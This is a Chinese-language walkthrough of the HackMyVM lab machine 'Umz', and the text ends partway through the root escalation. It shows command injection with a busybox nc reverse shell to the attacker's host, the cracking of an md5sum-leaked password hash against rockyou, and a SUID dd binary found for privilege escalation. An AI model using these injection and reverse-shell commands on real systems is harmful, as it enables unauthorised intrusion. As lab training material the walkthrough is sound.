{"id":913,"date":"2025-06-26T23:45:58","date_gmt":"2025-06-26T15:45:58","guid":{"rendered":"http:\/\/162.14.82.114\/?p=913"},"modified":"2025-06-26T23:45:58","modified_gmt":"2025-06-26T15:45:58","slug":"hmv-_-umz","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/913\/06\/26\/2025\/","title":{"rendered":"hmv[-_-]Umz"},"content":{"rendered":"<h1>Umz<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345935.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345935.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626214411376\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345937.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345937.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626230842472\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345939.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345939.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626220457429\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nRustScan: Because guessing isn&#039;t hacking.\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.104:22\nOpen 192.168.10.104:8080\n\nPORT     STATE SERVICE REASON         VERSION\n22\/tcp   open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)\n| ssh-hostkey: \n|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F\/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff\/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15\/h5hBsS\/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT\/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9\/wPmo6RBeb1d5t11SP8R5UHyI\/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=\n|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F\/EIiQoIHE=\n|   256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1\n8080\/tcp open  http    syn-ack ttl 64 Werkzeug httpd 1.0.1 (Python 3.9.2)\n| http-title: Debug Console Login\n|_Requested resource was http:\/\/192.168.10.104:8080\/login\n| http-methods: \n|_  Supported Methods: HEAD OPTIONS GET\nMAC Address: 08:00:27:4A:01:25 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP:8080\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.104:8080\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/login                (Status: 200) [Size: 1838]\n\/admin                (Status: 302) [Size: 219] [--&gt; http:\/\/192.168.10.104:8080\/login]\n\/console              (Status: 200) [Size: 1985]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345940.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345940.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626220732702\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ whatweb http:\/\/$IP:8080\nhttp:\/\/192.168.10.104:8080 [302 Found] Country[RESERVED][ZZ], HTTPServer[Werkzeug\/1.0.1 Python\/3.9.2], IP[192.168.10.104], Python[3.9.2], RedirectLocation[http:\/\/192.168.10.104:8080\/login], Title[Redirecting...], Werkzeug[1.0.1]\nhttp:\/\/192.168.10.104:8080\/login [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug\/1.0.1 Python\/3.9.2], IP[192.168.10.104], PasswordField[pass], Python[3.9.2], Title[Debug Console Login], Werkzeug[1.0.1]<\/code><\/pre>\n<h3>\u5f31\u53e3\u4ee4\u767b\u5f55<\/h3>\n<p>\u4f7f\u7528\u5f31\u53e3\u4ee4\u767b\u5f55<code>admin:admin<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345941.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345941.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626221520070\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\uff0c\u5c1d\u8bd5\u8fdb\u884c\u53cd\u5f39shell\uff1a<\/p>\n<pre><code class=\"language-bash\">127.0.0.1;whereis nc\n127.0.0.1;whereis busybox\n# busybox: \/usr\/bin\/busybox \/usr\/share\/man\/man1\/busybox.1.gz\n127.0.0.1;\/usr\/bin\/busybox nc -e \/bin\/bash 192.168.10.107 1234\n127.0.0.1;\/usr\/bin\/busybox nc 192.168.10.107 1234 -e bash<\/code><\/pre>\n<p>\u5947\u602a\u4e86\uff0c\u7b2c\u4e09\u6761\u6307\u4ee4\u5f39\u4e0d\u8fc7\u6765\uff0c\u4f46\u662f\u7b2c\u56db\u6761\u5f39\u7684\u8fc7\u6765\u3002\u3002\u3002\u3002\u3002\u3002\u8fd9\u662f\u56e0\u4e3a\uff1a<\/p>\n<p>BusyBox \u7684 <code>nc<\/code> \u547d\u4ee4\u8981\u6c42 <code>-e<\/code> \u9009\u9879\u5fc5\u987b\u7d27\u8ddf\u5728 <strong>\u76ee\u6807IP\u5730\u5740\u4e4b\u540e\u3001\u7aef\u53e3\u53f7\u4e4b\u524d<\/strong>\uff0c\u5426\u5219\u4f1a\u89e3\u6790\u5931\u8d25\uff0c\u5931\u7b56\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ busybox nc      \nBusyBox v1.37.0 (Debian 1:1.37.0-5) multi-call binary.\n\nUsage: nc [-iN] [-wN] [-l] [-p PORT] [-f FILE|IPADDR PORT] [-e PROG]\n\nOpen a pipe to IP:PORT or FILE\n\n        -l      Listen mode, for inbound connects\n                (use -ll with -e for persistent server)\n        -p PORT Local port\n        -w SEC  Connect timeout\n        -i SEC  Delay interval for lines sent\n        -f FILE Use file (ala \/dev\/ttyS0) instead of network\n        -e PROG Run PROG after connect<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345942.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345942.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626222517441\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>sudo md5sum<\/h3>\n<pre><code class=\"language-bash\">(remote) welcome@Umz:\/root$ whereis sudo\nsudo: \/usr\/bin\/sudo \/usr\/lib\/sudo \/etc\/sudo.conf \/usr\/share\/man\/man8\/sudo.8.gz\n(remote) welcome@Umz:\/root$ sudo -l\nMatching Defaults entries for welcome on Umz:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser welcome may run the following commands on Umz:\n    (ALL) NOPASSWD: \/usr\/bin\/md5sum\n(remote) welcome@Umz:\/root$ ls -la\nls: cannot open directory &#039;.&#039;: Permission denied\n(remote) welcome@Umz:\/root$ busybox ls -la\nls: .: Permission denied\n(remote) welcome@Umz:\/root$ cd ~\n(remote) welcome@Umz:\/home\/welcome$ ls -la\ntotal 24\ndrwxr-xr-x 2 welcome welcome 4096 May  3 10:26 .\ndrwxr-xr-x 4 root    root    4096 May  3 10:27 ..\nlrwxrwxrwx 1 root    root       9 May  3 10:26 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 welcome welcome  220 Apr 11 22:27 .bash_logout\n-rw-r--r-- 1 welcome welcome 3526 Apr 11 22:27 .bashrc\n-rw-r--r-- 1 welcome welcome  807 Apr 11 22:27 .profile\n-rw-r--r-- 1 root    root      44 May  3 10:26 user.txt\n(remote) welcome@Umz:\/home\/welcome$ cat user.txt \nflag{user-4483f72525b3c316704cf126bec02d5c}\n(remote) welcome@Umz:\/home\/welcome$ sudo \/usr\/bin\/md5sum \/root\/.ssh\/id_rsa\n\/usr\/bin\/md5sum: \/root\/.ssh\/id_rsa: No such file or directory\n(remote) welcome@Umz:\/home\/welcome$ sudo \/usr\/bin\/md5sum \/root\/root.txt\n96e36037c6b6cc4376485de090fb21c2  \/root\/root.txt<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u4f7f\u7528\u8bf4\u660e\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) welcome@Umz:\/home\/welcome$ md5sum --help\nUsage: md5sum [OPTION]... [FILE]...\nPrint or check MD5 (128-bit) checksums.\n\nWith no FILE, or when FILE is -, read standard input.\n\n  -b, --binary         read in binary mode\n  -c, --check          read MD5 sums from the FILEs and check them\n      --tag            create a BSD-style checksum\n  -t, --text           read in text mode (default)\n  -z, --zero           end each output line with NUL, not newline,\n                       and disable file name escaping\n\nThe following five options are useful only when verifying checksums:\n      --ignore-missing  don&#039;t fail or report status for missing files\n      --quiet          don&#039;t print OK for each successfully verified file\n      --status         don&#039;t output anything, status code shows success\n      --strict         exit non-zero for improperly formatted checksum lines\n  -w, --warn           warn about improperly formatted checksum lines\n\n      --help     display this help and exit\n      --version  output version information and exit\n\nThe sums are computed as described in RFC 1321.  When checking, the input\nshould be a former output of this program.  The default mode is to print a\nline with checksum, a space, a character indicating input mode (&#039;*&#039; for binary,\n&#039; &#039; for text or where binary is insignificant), and name for each FILE.\n\nGNU coreutils online help: &lt;https:\/\/www.gnu.org\/software\/coreutils\/&gt;\nFull documentation at: &lt;https:\/\/www.gnu.org\/software\/coreutils\/md5sum&gt;\nor available locally via: info &#039;(coreutils) md5sum invocation&#039;<\/code><\/pre>\n<p>\u6ca1\u6709\u5934\u7eea\u3002\u3002\u3002\u3002\u63a5\u7740\u4fe1\u606f\u641c\u96c6\u5427\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) welcome@Umz:\/opt\/flask-debug$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsshd\nwelcome\numzyyds\n(remote) welcome@Umz:\/opt\/flask-debug$ ls -la \/home\/umzyyds\nls: cannot open directory &#039;\/home\/umzyyds&#039;: Permission denied\n(remote) welcome@Umz:\/opt\/flask-debug$ ls -la\ntotal 20\ndrwxr-xr-x 2 welcome welcome 4096 May  3 10:32 .\ndrwxr-xr-x 3 root    root    4096 May  3 09:46 ..\n-rw-r--r-- 1 root    root    5001 May  3 10:23 flask_debug.py\n-rwx------ 1 root    root      10 May  3 10:32 umz.pass\n(remote) welcome@Umz:\/opt\/flask-debug$ sudo md5sum umz.pass \na963fadd7fd379f9bc294ad0ba44f659  umz.pass<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7206\u7834\u5bc6\u7801\uff0c\u5c1d\u8bd5<code>hydra<\/code>\u7206\u7834\u4f46\u662f\u65e0\u679c\uff0c\u731c\u6d4b\u53ef\u80fd\u662f\u56e0\u4e3a\u6362\u884c\u7b26\u7684\u539f\u56e0\uff0c\u6587\u4ef6\u53ef\u80fd\u662f<code>echo<\/code>\u8fdb\u53bb\u7684\u5bfc\u81f4\u591a\u4e86\u4e2a\u6362\u884c\u7b26\u3002\u3002\u3002\u3002<\/p>\n<blockquote>\n<p>\u8fd9\u91cc\u8981\u6ce8\u610f\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ echo 'abcd' | md5sum                          \nf5ac8127b3b6b85cdc13f237c6005d80  -\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ echo -n 'abcd' | md5sum\ne2fc714c4727ee9395f324cd2e7f331f  -<\/code><\/pre>\n<p>\u5982\u679c\u7206\u7834\u4e0d\u51fa\u6765\u5c31\u8981\u6362\u4e00\u4e0b\u3002\u3002\u3002\u3002\uff08\u522b\u95ee\u4e3a\u4ec0\u4e48\u4ffa\u4f1a\u8fd9\u4e48\u60f3\uff0c\u56e0\u4e3a\u8fd9\u79cd\u8822\u4e8b\u4ffa\u5e72\u8fc7\u3002\u3002\u3002\u3002\uff09<\/p>\n<p>\u8fd8\u8bb0\u5f97\u90a3\u662f\u4e00\u4e2a\u5f88\u4e45\u7684\u4e00\u5929\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345943.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345943.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626233930001\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345944.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345944.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"img\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345945.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345945.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626233845493\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8be6\u60c5\u53ef\u4ee5\u770b\uff1a<a href=\"https:\/\/hgbe02.github.io\/Hackmyvm\/roosterrun.html#%E9%A2%9D%E5%A4%96%E6%94%B6%E8%8E%B7\">https:\/\/hgbe02.github.io\/Hackmyvm\/roosterrun.html#%E9%A2%9D%E5%A4%96%E6%94%B6%E8%8E%B7<\/a><\/p>\n<\/blockquote>\n<p>\u7206\u7834\u51fa\u6765\u7684\u7ed3\u679c\u4e3a\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ while IFS= read -r line; do echo &quot;$line&quot; | md5sum | grep -q &quot;a963fadd7fd379f9bc294ad0ba44f659&quot; &amp;&amp; echo &quot;umzyyds:$line&quot; &amp;&amp; break; done &lt; \/usr\/share\/wordlists\/rockyou.txt \numzyyds:sunshine3<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5207\u6362\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345946.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345946.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626225243429\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743root<\/h3>\n<pre><code class=\"language-bash\">umzyyds@Umz:~$ ls -la\ntotal 96\ndrwx------ 2 umzyyds umzyyds  4096 May  3 10:42 .\ndrwxr-xr-x 4 root    root     4096 May  3 10:27 ..\nlrwxrwxrwx 1 root    root        9 May  3 10:38 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 umzyyds umzyyds   220 May  3 10:27 .bash_logout\n-rw-r--r-- 1 umzyyds umzyyds  3526 May  3 10:27 .bashrc\n-rwsr-sr-x 1 root    root    76712 May  3 10:42 Dashazi\n-rw-r--r-- 1 umzyyds umzyyds   807 May  3 10:27 .profile\numzyyds@Umz:~$ file Dashazi \\\n> \nDashazi: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=21bfd63cfb732f9c09d17921f8eef619429bcd35, stripped<\/code><\/pre>\n<p>\u4e0b\u8f7d\u5230\u672c\u5730\u8fdb\u884c\u67e5\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz]\n\u2514\u2500$ pwn checksec Dashazi          \n[*] &#039;\/home\/kali\/temp\/Umz\/Dashazi&#039;\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n    FORTIFY:    Enabled<\/code><\/pre>\n<p>\u7b49\u4e0b\uff0c\u4e0d\u5bf9\uff0c\u8c03\u8bd5\u4fe1\u606f\u88ab\u53bb\u9664\u4e86\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">umzyyds@Umz:~$ .\/Dashazi \nwhoami\naaaaa\naaaaa\nsdasdsadasdasdas\nsadasdasdasdasdasda\n^C0+5 records in\n0+0 records out\n0 bytes copied, 16.7264 s, 0.0 kB\/s<\/code><\/pre>\n<p>\u8fd9\u5565\u73a9\u610f\u554a\uff0c\u8fd9\u662f\uff0c\u641c\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345947.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506262345947.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626225843889\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u663e\u793a\u8fd9\u4f3c\u4e4e\u6765\u81ea\u547d\u4ee4<code>dd<\/code>\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">umzyyds@Umz:~$ whereis dd\ndd: \/usr\/bin\/dd \/usr\/share\/man\/man1\/dd.1.gz\numzyyds@Umz:~$ md5sum \/usr\/bin\/dd\n1f90de0a1b75febeda1936a1ed9e1066  \/usr\/bin\/dd\numzyyds@Umz:~$ md5sum Dashazi \n1f90de0a1b75febeda1936a1ed9e1066  